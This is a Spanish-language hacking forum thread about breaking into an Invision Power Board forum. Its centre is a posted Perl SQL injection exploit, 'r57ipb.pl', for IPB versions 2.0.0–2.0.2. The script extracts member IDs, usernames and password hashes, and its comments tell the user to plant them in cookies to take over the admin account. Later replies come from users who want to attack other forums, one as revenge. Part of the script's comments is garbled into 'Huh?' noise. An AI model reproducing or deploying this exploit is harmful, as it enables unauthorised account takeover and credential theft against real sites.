Vota por nosotros en el ranking web que participamos

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Octubre 16, 2008, 04:00:14
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Hack Novato  |  Hack para newbies (Moderadores: |_ocutus, zîx)  |  Tema: Hackear un Foro Invision 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Hackear un Foro Invision  (Leído 1489 veces)
aster88
Visitante
« en: Julio 20, 2005, 11:44:30 »

En línea
ainqis
Visitante
« Respuesta #1 en: Julio 21, 2005, 07:57:31 »

 Deja la url del foro para ver que onda.

           Nos vemos...

       
En línea
GracuM
Visitante
« Respuesta #2 en: Julio 22, 2005, 11:16:17 »

y la version aca dejo un exploit en perl para  invision version v2.0.0 al 2.0.2


#!/usr/bin/perl
use IO::Socket;

## Invision Power Board v2.0.0 - 2.0.2 sql injection exploit
## by RusH security team (
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.rst.void.ru
)
## coded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## example:
##
## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3
## ------------------------------------------------------------------------------------------------
## [>] SERVER: 127.0.0.1
## [>] DIR: /IPB202/
## [>] FORUM: 2
## [>] TOPIC: 1
## [>] SID: 3edb1eaeea640d297ee3b1f78b5679b3
## [>] PREFIX:
## [>] ID:
## ------------------------------------------------------------------------------------------------
##
## [~] PREPARE TO CONNECT...
##
  • CONNECTED
## [~] SENDING QUERY...
##
  • DONE!
##
## PREFIX: ibf_
##
## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3 ibf_
## ------------------------------------------------------------------------------------------------
## [>] SERVER: 127.0.0.1
## [>] DIR: /IPB202/
## [>] FORUM: 2
## [>] TOPIC: 1
## [>] SID: 3edb1eaeea640d297ee3b1f78b5679b3
## [>] PREFIX: ibf_
## [>] ID:
## ------------------------------------------------------------------------------------------------
##
## [~] PREPARE TO CONNECT...
##
  • CONNECTED
## [~] SENDING QUERY...
##
  • DONE!
##
## --[ REPORT ]------------------------------------------------------------------------------------
## MEMBER_ID: [1] NAME: [admin] PASS_HASH: [73dea61281aa9b08ed31b4ae2bb9954e]
## ------------------------------------------------------------------------------------------------
## Now you need edit cookie and insert new pass_hash and member_id values.
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Huh? Huh? ? HuhHuhHuhHuh HuhHuhHuh? HuhHuhHuh?:
## HuhHuh?? pass_hash Huh ?? HuhHuhHuhHuh? HuhHuh Huh??!!! ? HuhHuhHuh?? HuhHuh??
## ?? HuhHuh ? HuhHuh? HuhHuh?? Huh?? Huh?? ?? Huh?? Huh Huh?? HuhHuh Huh
## Huh?? HuhHuh. member_id Huh Huh?? HuhHuhHuh?? HuhHuh?? ?? HuhHuh. HuhHuh? ??
## Huh?? HuhHuh?? HuhHuhHuhHuh pass_hash =) HuhHuh HuhHuhHuhHuhHuh?? ?? HuhHuh ?
## HuhHuh?? pass_hash ? member_id ? Huh?? cookie ?? Huh? ?? HuhHuh??
## HuhHuh? HuhHuh HuhHuh.
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


if ( @ARGV < 5)
{
print "-------------------------------------------------------------------------\r\n";
print " Invision Power Board v2.0.0 - 2.0.2 sql injection exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
print "usage:\r\n";
print "r57ipb.pl SERVER /DIR/ FORUM_NUM TOPIC_NUM SID [TABLE_PREFIX] [USER_ID]\r\n\r\n";
print "SERVER - server where IPB installed\r\n";
print "/DIR/ - IPB directory or / for no directory\r\n";
print "FORUM_NUM - number of existing forum\r\n";
print "TOPIC_NUM - number of existing topic\r\n";
print "SID - your session id\r\n";
print "[TABLE_PREFIX] - table prefix in database\r\n";
print "[USER_ID] - user id for exploiting\r\n\r\n";
print "e.g. r57ipb.pl 127.0.0.1 /IPB/ 2 1 4496b6d35c1bc0662d721c207f81784e ibf_\r\n";
print "-------------------------------------------------------------------------\r\n";
exit();
}

if ( @ARGV < 6) { $get_table = 1; }

$server = $ARGV[0];
$dir = $ARGV[1];
$fnum = $ARGV[2];
$tnum = $ARGV[3];
$sid = $ARGV[4];
$prefix = $ARGV[5];
$id = $ARGV[6];

print "-----------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] FORUM: $fnum\r\n";
print "[>] TOPIC: $tnum\r\n";
print "[>] SID: $sid\r\n";
print "[>] PREFIX: $prefix\r\n";
print "[>] ID: $id\r\n";
print "-------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path = $dir;
$path .= "index.php?s=";
$path .= $sid;
$path .= "&act=Post&CODE=02&f=";
$path .= $fnum;
$path .= "&t=";
$path .= $tnum;
if ($get_table == 1)
{
$path .= "&qpid=r57"
}
else
{
$path .= "&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),
name,char(58),
member_login_key),1,1,1,1,1,1,1,1,1%20from%20";
$path .= $prefix;
$path .= "members";
$path .= ($id)?("%20WHERE%20id=$id%20")Sad"%20");
$path .= "/*";
}
print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",
PeerPort => "80") || die "[-]
CONNECTION FAILED";

print "
  • CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "
  • DONE!\r\n\r\n";

$suc =0;

if ($get_table == 1)
{
while ($answer = <$socket>)
{
if ($answer =~ /(mySQL query error: )(.*)( FROM )(.*)(posts)/){ print "PREFIX: $4\r\n";
$suc = 1; }
}
if (!$suc) { print "Exploit failed\r\n"; }
exit();
}

print "--[ REPORT ]---------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~ /^([^:]*)Sad[^:]*)Sad[a-z,0-9]{32})$/) { print "MEMBER_ID: [$1] NAME: [$2]
PASS_HASH: [$3]\r\n"; $suc = 1; }
}
print "------------------------------------------------------------------------------------------------\r\n";
if ($suc == 1) { print "Now you need edit cookie and insert new pass_hash and
member_id values.\r\n";
exit(); }
else { print "Exploit failed\r\n"; }

 
En línea
ainqis
Visitante
« Respuesta #3 en: Julio 22, 2005, 12:33:34 »

 Jjajaa si el men lo entiende te regalo un millon de euros  Cheesy

                 Nos vemos...
En línea
popeye1556
>>>>>LA LUZ DEL CONOCIMIENTO CONDUCE A LA LIBERTAD<<<<<
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2009


Confusion, desespero....


Ver Perfil
« Respuesta #4 en: Julio 24, 2005, 11:39:32 »

no, mejor si hackeas
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.microsoft.com
, no te doy 1 si no 7 millones
En línea

GracuM
Visitante
« Respuesta #5 en: Agosto 24, 2005, 08:56:49 »

bueno despues paso e numero de la cuenta xDDDD
En línea
Irengard
Visitante
« Respuesta #6 en: Enero 28, 2007, 03:15:50 »

Hola
no entendi para nada como hackear un foro Tongue

sorry no soy experto en estos temas
el exploit lo bajo de donde o lo hago...

pero un tipo hackeo nuestro foro de invision
y otras cosas.. es molesto y solo por un estupido juego.

ahora por lo menos quiero hacer lo mismo con el
pueden ayudarme.
de antemano muchas gracias.

Saludos

si alguien puede contactarse conmigo
En línea
Chaos2
Visitante
« Respuesta #7 en: Febrero 06, 2007, 09:15:17 »

yo quiero hackear un foro Invision Power Board v1.3 Final de invisionfree, pero no entiendo donde poner ese codigo o que hacer con el, por favor lo podrian explicar?
En línea
mycrox
Visitante
« Respuesta #8 en: Febrero 10, 2007, 09:46:52 »

En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Hack Novato  |  Hack para newbies (Moderadores: |_ocutus, zîx)  |  Tema: Hackear un Foro Invision « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.6 | SMF © 2006-2007, Simple Machines LLC